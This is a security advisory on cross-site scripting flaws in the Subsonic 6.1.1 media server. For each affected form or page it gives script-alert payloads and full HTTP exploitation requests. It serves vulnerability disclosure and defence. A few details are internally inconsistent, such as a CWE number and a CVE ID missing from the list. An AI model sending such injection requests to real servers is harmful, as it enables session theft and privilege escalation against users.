Tune into our first episode of Tool Talk: a how-to series for hackers. REGISTER ›

Subsonic 6.1.1 - Multiple Vulnerabilities

Critical Risk Advisory Featured

Share

Product Description

Subsonic is an open source web media server that enables the management of media resources such as music or videos. Its official website is www.subsonic.org. The version affected by the identified vulnerabilities is 6.1.1, released May 31, 2017.

Vulnerabilities List

Two types of cross-site scripting were identified within the Subsonic application:

  • 14 stored cross-site scripting instances
  • Five reflected cross-site scripting instances

These vulnerabilities are described in the following sections.

Affected Version

Version 6.1.1

Subsonic 6.1.1 — Vulnerabilities

Stored Cross-site Scripting

The Subsonic application is affected by 14 stored cross-site scripting (XSS) instances that are stored within different application features. These vulnerabilities enable the injection of a JavaScript payload inside a vulnerable page that will then be executed each time a user visits it. The vulnerabilities could be exploited with authenticated users and used to target administrators and steal their sessions.

Vulnerability Details

CVE ID: CVE-2018-9282, CVE-2018-14688, CVE-2018-14689, CVE-2018-14690, CVE-2018-14691

Access Vector: Remote

Security Risk: Critical

Vulnerability: CWE-79

CVSS Base Score: 9.8

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Stored XSS on Podcast Subscription Form (CVE-2018-9282)

The podcast subscription form is affected by one stored cross-site scripting instance. No administrator access is required to exploit this instance. By injecting a JavaScript payload into the form, an attacker can manipulate user sessions or elevate privileges by targeting an administrative user. The weak parameter is add. The following payload can be used to inject code and verify the vulnerability:

<script>alert(/XSS/)</script>

Figure 1 - XSS payload

The request below can be used to exploit the instances:

POST /podcastReceiverAdmin.view? HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

add=http%3A%2F%2F%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E

Figure 2 - XSS exploitation request 

Stored XSS on Music Tags Settings Form (CVE-2018-14691)

The music tags setting form is affected by three stored XSS instances. No administrator access is required to exploit these instances, but tag modification permission is required. By injecting a JavaScript payload into the form, an attacker can manipulate user sessions or elevate privileges by targeting an administrative user. The weak parameter is c0-param2, c0-param3, and c0-param4. The following payload can be used to inject code and verify the vulnerability:

“><script>alert(/XSS/)</script>

Figure 3 - XSS payload 

The request below could be used to exploit the instances:

POST /dwr/call/plaincall/tagService.setTags.dwr HTTP/1.1
Host: 192.168.1.36:4040
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

callCount=1
nextReverseAjaxIndex=0
c0-scriptName=tagService
c0-methodName=setTags
c0-id=0
c0-param0=string:65
c0-param1=string:1
c0-param2=string:%22%3E%3Cscript%3Ealert(%2FXSS1%2F)%3C%2Fscript%3E
c0-param3=string:%22%3E%3Cscript%3Ealert(%2FXSS2%2F)%3C%2Fscript%3E
c0-param4=string:%22%3E%3Cscript%3Ealert(%2FXSS3%2F)%3C%2Fscript%3E
c0-param5=string:
c0-param6=string:Bastard%20Pop
batchId=0
instanceId=0
page=%2FeditTags.view%3Fid%3D8
scriptSessionId=SESSIONID2

Figure 4 - XSS exploitation request 

Stored XSS on Internet Radio Settings Form (CVE-2018-14688)

The internet radio settings form is affected by three stored XSS instances. Administrator access is required to exploit these instances. By injecting JavaScript payload into the form, an attacker can manipulate user sessions. The weak parameter is is name[x], streamUrl[x], homepageUrl[x] where x is an integer. The following payload can be used to inject code and verify the vulnerability:

<script>alert(/XSS/)</script>

Figure 5 - XSS payload 

The request below could be used to exploit the instances:

POST /internetRadioSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

name%5B1%5D=%22%3Etest%22%3Cscript%3Ealert%28%2Fradioname%2F%29%3C%2Fscript%3E&streamUrl%5B1%5D=%22%3Etest%22%3Cscript%3Ealert%28%2Fradiostreamurl%2F%29%3C%2Fscript%3E&homepageUrl%5B1%5D=%22%3E%22%3Cscript%3Ealert%28%2Fradiohomepage%2F%29%3C%2Fscript%3E&enabled%5B1%5D=on&name=&streamUrl=&homepageUrl=&enabled=on

Figure 6 - XSS exploitation request

Stored XSS on General Settings Form (CVE-2018-14690)

The general settings form is affected by two stored XSS instances. Administrator access is required to exploit these instances. By injecting a JavaScript payload, an attacker can manipulate user sessions. The weak parameters are title and subtitle. The following payload can be used to inject code and verify the instances:

<script>alert(/XSS/)</script>

Figure 7 - XSS payload 

The request below could be used to exploit the instances:

POST /generalSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

musicFileTypes=mp3+ogg+oga+aac+m4a+flac+wav+wma+aif+aiff+ape+mpc+shn&videoFileTypes=flv+avi+mpg+mpeg+mp4+m4v+mkv+mov+wmv+ogv+divx+m2ts&coverArtFileTypes=cover.jpg+cover.png+cover.gif+folder.jpg+jpg+jpeg+gif+png&playlistFolder=%2Fvar%2Fplaylists&index=A+B+C+D+E+F+G+H+I+J+K+L+M+N+O+P+Q+R+S+T+U+V+W+X-Z%28XYZ%29&ignoredArticles=The+El+La+Los+Las+Le+Les&shortcuts=New+Incoming+Podcast&localeIndex=0&themeIndex=0&sortAlbumsByYear=true&_sortAlbumsByYear=on&_gettingStartedEnabled=on&welcomeTitle=Welcome+to+Subsonic%21%22%3E%3Cscript%3Ealert%28%2Fwelcometitle%2F%29%3C%2Fscript%3E&welcomeSubtitle=%22%3E%3Cscript%3Ealert%28%2Fwelcomesubtitle%2F%29%3C%2Fscript%3E&welcomeMessage=Welcome+to+Subsonic%21%0D%0A%5C%5C+%5C%5C%0D%0ASubsonic+is+a+free%2C+web-based+media+streamer%2C+providing+ubiquitous+access+to+your+music.+%0D%0A%5C%5C+%5C%5C%0D%0AUse+it+to+share+your+music+with+friends%2C+or+to+listen+to+your+own+music+while+at+work.+You+can+stream+to+multiple+players+simultaneously%2C+for+instance+to+one+player+in+your+kitchen+and+another+in+your+living+room.%0D%0A%5C%5C+%5C%5C%0D%0ATo+change+or+remove+this+message%2C+log+in+with+administrator+rights+and+go+to+%7Blink%3ASettings+%3E+General%7CgeneralSettings.view%7D.%0D%0A&loginMessage=

Figure 8 - XSS exploitation request 

Stored XSS on Transcoding Settings Form (CVE-2018-14689)

The transcoding settings form is affected by five stored XSS instances. Administrator access is required to exploit these instances. By injecting a JavaScript payload, an attacker could manipulate user sessions. The weak parameters are name[x], sourceformats[x], targetFormat[x], step1[x], and step2[x] where x is an integer. The following payload can be used to inject code and verify the instances:

<script>alert(/XSS/)</script>

Figure 9 - XSS payload

The request below could be used to exploit the instances:

POST /transcodingSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

name%5B0%5D=mp3+audio&sourceFormats%5B0%5D=ogg+oga+aac+m4a+flac+wav+wma+aif+aiff+ape+mpc+shn&targetFormat%5B0%5D=mp3&step1%5B0%5D=ffmpeg+-i+%25s+-map+0%3A0+-b%3Aa+%25bk+-v+0+-f+mp3+-&step2%5B0%5D=&name%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fname%2F%29%3C%2Fscript%3E&sourceFormats%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fconvertfrom%2F%29%3C%2Fscript%3E&targetFormat%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fconvertto%2F%29%3C%2Fscript%3E&step1%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fstep1%2F%29%3C%2Fscript%3E&step2%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fstep2%2F%29%3C%2Fscript%3E&name=&sourceFormats=&targetFormat=&step1=&step2=&defaultActive=on&downsampleCommand=ffmpeg+-i+%25s+-map+0%3A0+-b%3Aa+%25bk+-v+0+-f+mp3+-

Figure 10 - XSS exploitation request

Reflected Cross-site Scripting

The Subsonic application is affected by five reflected cross-site scripting (XSS) instances that require user interaction to be executed.

Vulnerability Details

CVE ID: CVE-2018-14687, CVE-2018-14689, CVE-2018-14692

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-352

CVSS Base Score: 8.8

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Reflected XSS Player Settings Form (CVE-2018-14687)

The personal player settings form is affected by three cross-site scripting instances. By injecting JavaScript payload into the vulnerable parameters, an attacker could use this page to manipulate the user session. Weak parameters are clone, id and technologyName. To inject code and verify the flaw the following payload could be used:

<script>alert(/XSS/)</script>

Figure 11 - XSS exploitation request 

The request below could be used to exploit the instances:

http://HOST/playerSettings.view?clone=%3cscript%3ealert(/XSS/)%3c%2fscript%3e

http://HOST/playerSettings.view?id=%3cscript%3ealert(/XSS/)%3c%2fscript%3e

POST /playerSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

playerId=3&technologyName=JUKEBOX%3cscript%3ealert(/XSS/)%3c%2fscript%3e&name=test&transcodeSchemeName=OFF&dynamicIp=true&_dynamicIp=on&autoControlEnabled=true&_autoControlEnabled=on&activeTranscodingIds=0&_activeTranscodingIds=on

Figure 12XSS exploitation requests 

Reflected XSS Stream Page (CVE-2018-14692)

The stream page is affected by one cross-site scripting instance. By injecting a JavaScript payload into the vulnerable parameters, an attacker can use this page to manipulate user sessions. The weak parameter is player. The following payload can be used to inject code and verify the instance:

<script>alert(/XSS/)</script>

Figure 13 - XSS payload 

The request below could be used to exploit the instance:

http://HOST/stream?player=%3Cscript%3Ealert(/XSS/)%3C/script%3E&id=79&auth=1289324648&suffix=.mp3

Figure 14 - XSS exploitation request 

Reflected XSS Network Settings Form (CVE-2018-14694)

The network settings form is affected by one cross-site scripting instance. By injecting a JavaScript payload into the vulnerable parameter, an attacker can use this form to manipulate user sessions. The weak parameter is urlRedirectingType. The following payload can be used to inject code and verify the instance:

<script>alert(/XSS/)</script>

Figure 15 - XSS payload 

The request below can be used to exploit the instance:

POST /networkSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

_portForwardingEnabled=on&urlRedirectionEnabled=true&_urlRedirectionEnabled=on&urlRedirectType=CUSTOM%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&urlRedirectCustomUrl=http%3A%2F%2Ftest

Figure 16 - XSS exploitation request 

Disclosure Timeline: 

  • 10/5/2017: Initial discovery
  • 4/3/2018: CVEs requested 
  • 9/14/2018: Public disclosure of vulnerabilities 

Researcher:

Florian Nivette, Security Associate at Bishop Fox 


Florian nivette

About the author, Florian Nivette

Senior Security Consultant

Florian Nivette (CEH, CHFI, CEI, GSNA) is a Bishop Fox Alumnus who was a Senior Security Consultant at Bishop Fox, where he focused on application and network penetration testing and in-depth OS-level security. Florian is an active security researcher focusing on web applications, with a number of published CVEs (CVE-2018-11349, CVE-2018-11350, CVE-2018-11351, CVE-2018-13407, CVE-2018-11408, CVE-2018-13409, CVE-2017-77737, CVE-2017-5870, and CVE-2017-6086). He is one of the chief organizers of Nuit du Hack CTF, the largest and most well-known capture-the-flag competition in France, which draws thousands of security researchers annually.

More by Florian

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.